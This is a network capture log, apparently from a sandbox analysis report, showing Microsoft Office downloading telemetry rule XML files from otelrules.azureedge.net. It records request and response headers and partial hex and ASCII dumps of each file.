                                                                                                                                                                            2024-10-28 18:12:34 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            89192.168.2.44984213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:34 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:34 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                            x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181234Z-17fbfdc98bb7jfvg3dxcbz5xm000000003m000000000fr7a
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            90192.168.2.44984413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:34 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                                            x-ms-request-id: 3a0fb8a5-701e-0050-6930-276767000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-17fbfdc98bb6vp4m3kc0kte9cs0000000670000000004gue
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            91192.168.2.44984313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:34 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                            x-ms-request-id: d866d412-001e-0028-1c9c-27c49f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-17fbfdc98bbp77nqf5g2c5aavs00000004y000000000g0tu
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            92192.168.2.44984513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:35 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                            x-ms-request-id: eb17c832-b01e-0097-1249-274f33000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-r1755647c66t77qv3m6k1gb3zw0000000550000000000bdg
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            93192.168.2.44984613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:35 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                            x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-17fbfdc98bb2cvg4m0cmab3ecw000000046g000000001tmp
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            94192.168.2.44984713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:35 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                            x-ms-request-id: cdbfd92d-501e-0029-317f-27d0b8000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-r1755647c66f4bf880huw27dwc00000006p000000000gv2k
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            95192.168.2.44984813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:35 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                            x-ms-request-id: 174e4ed1-f01e-0052-3d1b-279224000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-r1755647c66hxv26qums8q8fsw00000003h0000000006y6u
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            96192.168.2.44984913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:35 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                            x-ms-request-id: 4e087ea8-e01e-0099-0e5a-28da8a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-r1755647c66hxv26qums8q8fsw00000003e000000000e4s8
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            97192.168.2.44985013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:36 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:36 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                            x-ms-request-id: 5ec9f71f-c01e-0082-7a31-26af72000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-r1755647c6688lj6g0wg0rqr1400000005p0000000003prt
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
